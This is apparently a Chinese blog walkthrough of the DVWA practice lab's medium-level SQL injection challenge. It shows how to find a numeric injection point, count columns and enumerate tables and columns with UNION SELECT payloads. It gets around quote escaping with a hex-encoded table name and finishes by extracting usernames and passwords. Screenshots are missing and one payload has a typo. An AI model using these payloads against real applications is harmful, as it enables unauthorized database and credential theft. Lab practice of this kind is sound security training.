dvwa闯关——medium级SQL

medium级的sql不让用户输入,可以通过burpsuite抓包绕过

一、判断是否有注入点,注入类型、字段数等

  1.是否有注入即注入类型

  

 

 

   dvwa闯关——medium级SQL_第1张图片

  修改为id=1 and 1=1后,如下图:

 

 

 

   

 

 

   存在注入点为数字型

  2.判断字段数

  1 order by 2时:

  dvwa闯关——medium级SQL_第2张图片

  

   1 order by 3时:

 

 

   dvwa闯关——medium级SQL_第3张图片

  

 

 

   所以字段数为2

  3.确定回显位置

   

 

 

   dvwa闯关——medium级SQL_第4张图片

 

 

   4.查询数据库及版本

  dvwa闯关——medium级SQL_第5张图片

 

 

   dvwa闯关——medium级SQL_第6张图片

 

 

   5.获取数据库中所有表

  1 union select 1,table_name from information_schema.tables where table_schema=database()

  

 

   该数据库有两张表

  dvwa闯关——medium级SQL_第7张图片

 

   6.获取列名

  单引号被转义了,所以不能用table_name='users'获取数据,用十六进制绕过

  1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273

  

  列名

  

 

   7.获取用户和密码

  1 union select user,password form users

  dvwa闯关——medium级SQL_第8张图片

  用户和密码

  dvwa闯关——medium级SQL_第9张图片

 

 

  

你可能感兴趣的:(dvwa闯关——medium级SQL)